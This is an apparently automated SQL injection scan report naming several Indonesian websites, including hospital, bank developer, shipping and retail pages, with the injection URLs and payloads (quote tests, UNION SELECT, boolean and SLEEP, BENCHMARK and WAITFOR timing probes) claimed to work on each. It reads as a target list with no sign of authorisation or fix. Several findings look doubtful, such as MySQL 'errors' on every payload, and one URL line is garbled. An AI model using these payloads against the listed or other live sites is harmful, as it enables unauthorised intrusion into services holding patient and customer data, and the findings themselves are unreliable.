=== SQL Injection Scan Report ===

Scan completed in: 95.58 seconds
URLs scanned: 19
Vulnerabilities found: 35

=== Vulnerable URLs ===

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id='29
Type: error_based
Payload: '
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1'29
Type: error_based
Payload: 1'
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' ORDER BY 1--29
Type: error_based
Payload: 1' ORDER BY 1--
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' UNION SELECT NULL--29
Type: error_based
Payload: 1' UNION SELECT NULL--
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' AND ERROR()29
Type: error_based
Payload: 1' AND ERROR()
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' AND SLEEP(2)--29
Type: error_based
Payload: 1' AND SLEEP(2)--
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' AND BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))--29
Type: error_based
Payload: 1' AND BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))--
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1') AND SLEEP(2)--29
Type: error_based
Payload: 1') AND SLEEP(2)--
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' WAITFOR DELAY '0:0:2'--29
Type: error_based
Payload: 1' WAITFOR DELAY '0:0:2'--
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' AND 1=1--29
Type: error_based
Payload: 1' AND 1=1--
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' AND 1=1--29
Type: boolean_based
Payload: 1' AND 1=1--

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' AND 1=2--29
Type: error_based
Payload: 1' AND 1=2--
Database: mysql
Error: SQL syntax

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' AND 1=2--29
Type: boolean_based
Payload: 1' AND 1=2--

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' AND 'a'='a29
Type: boolean_based
Payload: 1' AND 'a'='a

URL: https://rsmmcsby.co.id/spesialis/tampil.php?id=1' AND 'a'='b29
Type: boolean_based
Payload: 1' AND 'a'='b

URL: https://developers.bri.co.id/index.php/id/product?search=1' AND 1=1--&page=1' AND 1=1--7
Type: boolean_based
Payload: 1' AND 1=1--

URL: https://developers.bri.co.id/index.php/id/product?search=1' AND 1=2--&page=1' AND 1=2--7
Type: boolean_based
Payload: 1' AND 1=2--

URL: https://developers.bri.co.id/index.php/id/product?search=1' AND 'a'='a&page=1' AND 'a'='a7
Type: boolean_based
Payload: 1' AND 'a'='a

URL: https://developers.bri.co.id/index.php/id/product?search=1' AND 'a'='b&page=1' AND 'a'='b7
Type: boolean_based
Payload: 1' AND 'a'='b

URL: https://rhbtradesmart.co.id/wp-links-opml.php
Type: time_based
Payload: 1') AND SLEEP(2)--
Execution Time: 3.13s

URL: https://www.pelni.co.id/index.php/penghargaan?page=1' AND 1=1--7
Type: boolean_based
Payload: 1' AND 1=1--

URL:     AND 1=2--7
Type: boolean_based
Payload: 1' AND 1=2--

URL: https://www.pelni.co.id/index.php/penghargaan?page=1' AND 'a'='a7
Type: boolean_based
Payload: 1' AND 'a'='a

URL: https://www.pelni.co.id/index.php/penghargaan?page=1' AND 'a'='b7
Type: boolean_based
Payload: 1' AND 'a'='b

URL: https://www.karihome.co.id/zh-ID/product_page.php?id=1' AND 1=1--28&ps_id=1' AND 1=1--12
Type: boolean_based
Payload: 1' AND 1=1--

URL: https://www.karihome.co.id/zh-ID/product_page.php?id=1' AND 1=2--28&ps_id=1' AND 1=2--12
Type: boolean_based
Payload: 1' AND 1=2--

URL: https://www.karihome.co.id/zh-ID/product_page.php?id=1' AND 'a'='a28&ps_id=1' AND 'a'='a12
Type: boolean_based
Payload: 1' AND 'a'='a

URL: https://www.karihome.co.id/zh-ID/product_page.php?id=1' AND 'a'='b28&ps_id=1' AND 'a'='b12
Type: boolean_based
Payload: 1' AND 'a'='b

URL: https://rspon.co.id/karir.php
Type: time_based
Payload: 1' AND SLEEP(2)--
Execution Time: 2.20s

URL: https://rspon.co.id/karir.php
Type: time_based
Payload: 1') AND SLEEP(2)--
Execution Time: 2.66s

URL: https://rspon.co.id/karir.php
Type: time_based
Payload: 1' WAITFOR DELAY '0:0:2'--
Execution Time: 2.39s

URL: https://rspon.co.id/pendaftaranonline.php
Type: time_based
Payload: 1' AND SLEEP(2)--
Execution Time: 2.36s

URL: https://rspon.co.id/pendaftaranonline.php
Type: time_based
Payload: 1' AND BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))--
Execution Time: 2.21s

URL: https://rspon.co.id/pendaftaranonline.php
Type: time_based
Payload: 1') AND SLEEP(2)--
Execution Time: 2.97s

URL: https://rspon.co.id/pendaftaranonline.php
Type: time_based
Payload: 1' WAITFOR DELAY '0:0:2'--
Execution Time: 2.76s

